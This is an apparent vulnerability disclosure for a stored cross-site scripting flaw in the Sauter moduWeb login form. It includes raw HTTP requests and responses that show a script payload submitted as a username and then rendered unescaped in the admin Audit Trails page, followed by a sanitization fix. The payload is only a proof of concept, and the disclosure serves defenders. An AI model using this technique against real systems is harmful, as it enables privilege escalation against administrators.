A remote unauthenticated attacker can insert a malicious XSS payload in the username field of the Login Form and then click on "Login" Button to trigger the authentication process, then the login authentication will fail. But, the malicous payload will be recorded as a username value in the Logs. The Logs are accessible via the Web User Interface (Audit Trails functionality). An authenticated user (admin) could trigger the malicous XSS payload by just visiting the "Audit Trails" tab. This would result in privilege escalation or unauthorized actions execution in the context of an authenticated user (e.g. admin).

User Input Sanitization should be implemented for fixing this issue.

Below, evidence is provided.


Request 1:
POST /login HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://1.1.1.1
DNT: 1
Connection: close
Referer: http://1.1.1.1/login
Cookie: ksp=-1110528677045210722
Upgrade-Insecure-Requests: 1

locale=en&login=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=anything&submit=Login



Response 1:
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8; IE=9" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="SHORTCUT ICON"  type="image/x-icon" href="/favicon.ico" />
<link rel="stylesheet" type="text/css" href="/resources/css/print.css" media="print" />
<link rel="stylesheet" type="text/css" href="/resources/css/all-in-one.css" media="screen" />
<link rel="stylesheet" type="text/css" href="/resources/css/page-specific/login.css" media="screen" />
<title>Sauter moduWeb - Login</title>
</head>
<body>
<div class="content-wrapper">
<div class="content">
<div class="langselect">
<a class="service-menu-btn lang-btn last " href="/login?locale=ca">CA</a>
<a class="service-menu-btn lang-btn " href="/login?locale=fr">FR</a>
<a class="service-menu-btn lang-btn active " href="/login?locale=en">EN</a>
<a class="service-menu-btn lang-btn first " href="/login?locale=de">DE</a>
	
</div>
<form action="/login" method="post" id="loginForm" style="display: inline-block" class="form width_100"> 
<input type="hidden" name="locale" value="en"/>
<div style="height: 24px; margin-bottom: 4px;">

<div class="ui-state-error" id="errorMessages" style="display:inline-block;">
<p>Login failed</p>
</div>

</div>
<label for="username">User:</label>
<input type="text" name="login" size="20" /><br/>
<label for="password">Password:</label>
<input type="password" name="password" size="20" /><br/>
<div class="submitpane">
<input type="submit" name="submit" class="text-right ui-button ui-widget ui-state-default ui-corner-all" value="Login" />
</div>
</form>				
</div>
</div>
</body>
</html>







Request 2:
GET /state/audittrail HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://1.1.1.1/state/overview
DNT: 1
Connection: close
Cookie: ksp=-11612370276120097
Upgrade-Insecure-Requests: 1


Response 2:
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> 

.....code......
...............

<tr class="odd">
<td> Login failed</td>
<td><script>alert(1)</script></td>
<td>0.0.0 00:00:00</td>
</tr>

.....code......
...............

</html>